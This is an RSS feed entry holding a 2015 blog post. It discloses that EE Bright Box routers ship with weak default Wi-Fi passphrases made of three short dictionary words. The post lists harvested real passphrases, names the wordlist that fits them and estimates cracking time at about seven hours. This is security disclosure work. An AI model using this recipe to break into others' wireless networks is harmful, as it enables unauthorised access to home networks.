&lt;h2 id=&quot;the-current-state-of-play&quot;&gt;The current state of play&lt;/h2&gt;

&lt;p&gt;A new broadband customer will typically go through the following process when they join a provider and receive their shiny, new router:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Plug the router and necessary cables in&lt;/li&gt;
  &lt;li&gt;Enter the default passphrase from the label on the back/bottom of the router into their wireless devices&lt;/li&gt;
  &lt;li&gt;Get on with the rest of their life&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The majority of users neither know nor care about the security afforded to their wireless network out of the box - if there’s a password to get in, then it’s secure, right?&lt;/p&gt;

&lt;p&gt;And so we have the situation where the majority of home wireless networks out there still use the encryption algorithm and passphrase that the router came configured with. For routers made within the last few years the former will almost certainly be WPA/WPA2, but when it comes to the default passphrase, there are manufacturers who still get this wrong.&lt;/p&gt;

&lt;h2 id=&quot;ee-bright-box&quot;&gt;EE Bright Box&lt;/h2&gt;
&lt;p&gt;Case in point is the EE Bright Box, the router provided by UK mobile, phone, television and broadband provider EE. Here’s an example of what you’ll find on the back of the router:&lt;/p&gt;

&lt;p class=&quot;center&quot;&gt;&lt;img src=&quot;/images/ee-brightbox-label.gif&quot; alt=&quot;ee-brightbox-label.gif&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We see the default passphrase for the wireless network this router will present to the world is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gum-sleep-free&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Well, 14 characters isn’t bad at all - were it completely random, such as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Cxa?x'(|,&amp;amp;}Yx#&lt;/code&gt;, then we’d have been on to a winner - however, this is far from random: it has structure.&lt;/p&gt;

&lt;h2 id=&quot;so-whats-the-structure&quot;&gt;So what’s the structure?&lt;/h2&gt;
&lt;p&gt;I took to the internet, and despite there not being any mainstream articles covering the inadequate security shipped with the EE Bright Box, I quickly stumbled upon a relevant discussion on the HashKiller forum.&lt;/p&gt;

&lt;p&gt;Users of the forum had gathered Bright Box handshakes from across the UK (to which I contributed one of my own) to analyse exactly how susceptible these default passphrases were to dictionary attack. As it turned out, the answer was “quite”.&lt;/p&gt;

&lt;p&gt;All of the harvested passphrases took the form of three “dictionary” words - one of length 3, one of length 4, and one of length 5 - joined by a ‘-‘, in any permutation. Here’s an exhaustive list of the discovered passphrases posted on the forum:&lt;/p&gt;

&lt;h4 id=&quot;5-4-3&quot;&gt;5-4-3&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;horse-duck-dog&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;route-know-apt&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;guest-mean-apt&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nerve-pick-six&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;truck-rank-few&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;4-5-3&quot;&gt;4-5-3&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cash-sting-six&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;vase-boast-own&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;farm-blend-own&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;want-dwell-fit&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;curb-appal-top&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;4-3-5&quot;&gt;4-3-5&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wait-rob-weary&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;3-4-5&quot;&gt;3-4-5&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dog-duck-horse&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ant-stab-ideal&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cue-reply-such&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;3-5-4&quot;&gt;3-5-4&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gum-sleep-free&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pea-share-nice&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;leg-draft-good&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;use-teach-thin&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;toe-guard-calm&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tea-yield-dear&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id=&quot;5-3-4&quot;&gt;5-3-4&lt;/h4&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;alarm-rub-male&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;label-fan-cool&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Close inspection of the list shows that there are common words across the different passphrases, too: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;apt&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dog&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;own&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;six&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;duck&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;horse&lt;/code&gt; all appear more than once, suggesting that the “dictionary” from which they are taken may be rather small. Also, as pointed out by one of the forum members, the presence of “appal” suggests that this is a UK English dictionary, as this is spelt “appall” in US English.&lt;/p&gt;

&lt;h4 id=&quot;keyspace-estimation&quot;&gt;Keyspace estimation&lt;/h4&gt;
&lt;p&gt;Taking the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;british-english-small&lt;/code&gt; wordlist, we have 484 three-letter words, 1,919 four-letter words, and 3,557 five-letter words, giving 19,822,364,232 possible passphrases across the six permutations. On modern hardware, you can try nearly 1,000,000 of these per second, yielding the correct passphrase (assuming the constituent words are in the dictionary chosen above) in little over 7 hours.&lt;/p&gt;

&lt;h4 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h4&gt;
&lt;p&gt;If you’re reading this and have an EE Bright Box with the default passphrase, go change it! Better still, router manufacturers need to do a better job of supplying equipment with secure default configurations; breaking into a wireless network should take an order of years or decades, not hours.&lt;/p&gt;
</description>
        <pubDate>Wed, 29 Jul 2015 00:00:00 +0000</pubDate>
        <link>/post/ee-brightbox-default-wpa-passphrases-are-not-secure/</link>
        <guid isPermaLink="true">/post/ee-brightbox-default-wpa-passphrases-are-not-secure/</guid>
        
        
      </item>
    
  </channel>
</rss>
